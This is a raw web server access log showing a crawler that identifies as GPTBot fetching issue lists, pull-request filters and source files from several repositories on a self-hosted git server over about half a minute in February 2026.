"https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx?display=source" [Client 74.7.227.38] [Length 11763] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:19:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11300] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:19:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33682] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33684] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33694] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33684] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:19:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11140] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33387] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:19:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:19:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33695] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33695] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11129] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:19:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33390] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:19:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33390] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:19:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:19:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:19:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11212] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56639] [Gzip 9.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" +[17/Feb/2026:19:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 